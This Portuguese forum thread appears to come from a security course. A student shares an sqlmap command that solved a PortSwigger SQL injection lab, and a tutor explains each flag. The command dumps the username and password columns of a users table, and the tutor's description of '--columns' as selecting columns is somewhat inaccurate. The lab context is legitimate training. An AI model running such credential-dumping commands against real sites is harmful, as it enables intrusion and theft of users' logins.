A solução que consegui:
sqlmap -u {sua_url} -D public -T users --columns "password || username" --dump
*Obs: lembre-se de utilizar a sua url do lab do PortSwigger
A solução que consegui:
sqlmap -u {sua_url} -D public -T users --columns "password || username" --dump
*Obs: lembre-se de utilizar a sua url do lab do PortSwigger
Olá, Jean.
Tudo bem?
Agradeço por compartilhar sua solução para o desafio de SQL Injection! Sua sugestão parece estar correta e é uma ótima maneira de explorar vulnerabilidades de injeção SQL em aplicações web. Parabéns. Continue praticando.
No entanto, gostaria de adicionar alguns pontos para tornar a solução mais clara para todos. O comando que você compartilhou é usado para extrair dados de um banco de dados específico usando a ferramenta sqlmap. Aqui está o que cada parte do comando faz:
-u {sua_url}
: Este é o URL do site que você está testando.-D public
: Isso especifica o banco de dados que você deseja testar. Neste caso, é o banco de dados 'public'.-T users
: Isso especifica a tabela que você deseja testar. Neste caso, é a tabela 'users'.--columns "password || username"
: Isso especifica as colunas que você deseja testar. Neste caso, são as colunas 'password' e 'username'.--dump
: Este comando extrai os dados das colunas especificadas.Então, basicamente, o que este comando faz é extrair os dados das colunas 'password' e 'username' da tabela 'users' do banco de dados 'public' do site especificado.
Espero ter ajudado e bons estudos!